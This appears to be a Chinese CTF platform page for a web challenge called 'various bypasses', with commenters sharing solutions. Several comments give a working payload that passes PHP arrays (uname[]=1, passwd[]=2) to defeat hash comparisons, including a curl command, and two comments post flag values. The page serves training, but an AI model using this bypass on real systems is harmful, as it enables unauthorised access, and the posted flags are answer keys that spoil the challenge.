各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 3973
提  示:
描  述:
各种绕过
评论
xxt666 1年前

http://114.67.175.224:11569/?&name[]=1&id=margin passwd[]=2

回复 0

wxy1343 1年前

flag{dbb5bcdc8396249afe887041eb7beaf5}

回复 0

jsjm 2年前

方法1.curl -d "passwd[]=2" "http://114.67.175.224:16568/?id=%6d%61%72%67%69%6e&uname[]=1"#--data不行,只能用-d参数 。--方法2.bp同样的get和post,需要额外加个头部Content-Type: applicat

回复 1

龙图主人夏天 2年前

首先使用Get方法传值,?uname[]=1&&id=margin,火狐浏览器使用hackbar的平替,Max Hackbar,按F12使用为POST传值,passwd[]=2,利用数组绕过哈希,输出flag

回复 0

thresheses 2年前

感觉urldecode($_GET['id']);没限制到什么?

回复 0

Striker123456 2年前

burp_suite改post数据没用,得hackbar。干

回复 2
YSN97 1年前

检查一下发出去的post包有没有content-type和content-length头,如果没有是无效数据,后台无法正确解析。

回复 0

109张某 1年前

+1

回复 0

zdfy005 2年前

md5 数组绕过

回复 0

追风亚索 2年前

那些函数遇到数组全部返回NULL,直接用数组绕过就行,直接出来了

回复 0

a_i_su 2年前

其实就是加密后md5=0的明文、GET和POST

回复 0
冯飞99 1年前

人家用的不是sha1吗?和md5有啥关系呀?

回复 0

15708490585 2年前

能给个writeup吗?

回复 0

18725321338 2年前

flag{f7620215aeec70b66c6568d538f9fde6}

回复 0

WriteUp

image
harry

3 金币

评分(3)

解题动态

Pikirdy 攻破了该题 51分钟前
nakanodarling 攻破了该题 13小时前
dicce 攻破了该题 18小时前
2023201436 攻破了该题 18小时前
hannawfl 攻破了该题 1天前
zhuimengpi 攻破了该题 1天前
Subuloy 攻破了该题 1天前
2424291140 攻破了该题 1天前
hhhhl 攻破了该题 1天前
卡卡罗特M 攻破了该题 4天前
Rookieeeee 攻破了该题 4天前
exmored 攻破了该题 4天前
神级菜鸟 攻破了该题 4天前
YXW3 攻破了该题 5天前
yutou 攻破了该题 5天前
18803687092 攻破了该题 5天前
jiubanyipeng 攻破了该题 6天前
kuafu一shell 攻破了该题 6天前
bugtest 攻破了该题 7天前
zber 攻破了该题 7天前
问题反馈